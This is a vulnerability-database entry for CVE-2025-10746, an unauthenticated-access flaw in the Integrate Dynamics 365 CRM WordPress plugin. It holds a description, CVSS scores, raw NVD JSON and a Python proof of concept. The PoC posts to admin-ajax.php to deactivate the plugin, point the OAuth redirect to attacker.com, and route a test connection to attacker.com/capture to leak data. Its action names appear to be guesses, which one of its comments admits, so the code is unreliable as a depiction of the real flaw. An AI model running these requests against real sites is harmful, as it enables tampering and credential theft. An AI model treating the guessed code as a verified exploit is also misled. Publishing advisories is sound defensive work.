Security Vulnerability Report
CVE-2025-10746 CVSS 6.5 MEDIUM

CVE-2025-10746

Published: 2025-10-04 03:15:36
Last Modified: 2026-04-15 00:35:42

Description

The Integrate Dynamics 365 CRM plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.9. This is due to missing capability checks and nonce verification on functions hooked to 'init'. This makes it possible for unauthenticated attackers to deactivate the plugin, tamper with OAuth configuration, and trigger test connections that expose sensitive data via direct request to vulnerable endpoints granted they can craft malicious requests with specific parameters.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Integrate Dynamics 365 CRM <= 1.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10746 PoC - Integrate Dynamics 365 CRM Unauthorized Access
# Vulnerability: Missing capability checks and nonce verification on 'init' hooked functions
# Affected: All versions up to and including 1.0.9

import requests

target_url = "http://target-wordpress-site.com"

# Step 1: Deactivate the plugin (unauthenticated)
deactivate_payload = {
    "action": "deactivate_plugin",  # or similar parameter name used by the plugin
    "plugin": "integrate-dynamics-365-crm/integrate-dynamics-365-crm.php"
}
response = requests.post(target_url + "/wp-admin/admin-ajax.php", data=deactivate_payload)
print(f"Plugin deactivation attempt: {response.status_code}")

# Step 2: Tamper with OAuth configuration
oauth_payload = {
    "action": "update_oauth_config",
    "client_id": "attacker_client_id",
    "client_secret": "attacker_secret",
    "redirect_uri": "https://attacker.com/callback"
}
response = requests.post(target_url + "/wp-admin/admin-ajax.php", data=oauth_payload)
print(f"OAuth config tampering attempt: {response.status_code}")

# Step 3: Trigger test connection to expose sensitive data
test_connection_payload = {
    "action": "test_connection",
    "endpoint": "https://attacker.com/capture"  # redirect to attacker-controlled server
}
response = requests.post(target_url + "/wp-admin/admin-ajax.php", data=test_connection_payload)
print(f"Test connection attempt: {response.status_code}")
print(f"Response data: {response.text}")

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-10746",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-04T03:15:35.860",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Integrate Dynamics 365 CRM plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.9. This is due to missing capability checks and nonce verification on functions hooked to 'init'. This makes it possible for unauthenticated attackers to deactivate the plugin, tamper with OAuth configuration, and trigger test connections that expose sensitive data via direct request to vulnerable endpoints granted they can craft malicious requests with specific parameters."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/tags/1.0.9/Observer/adminObserver.php#L26",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/tags/1.0.9/integrate-dynamics-365-crm.php#L48",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/trunk/Observer/class-adminobserver.php?rev=3370266#L71",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7fb23e8-dabb-4d6e-a2b2-2b27d6a38b3c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}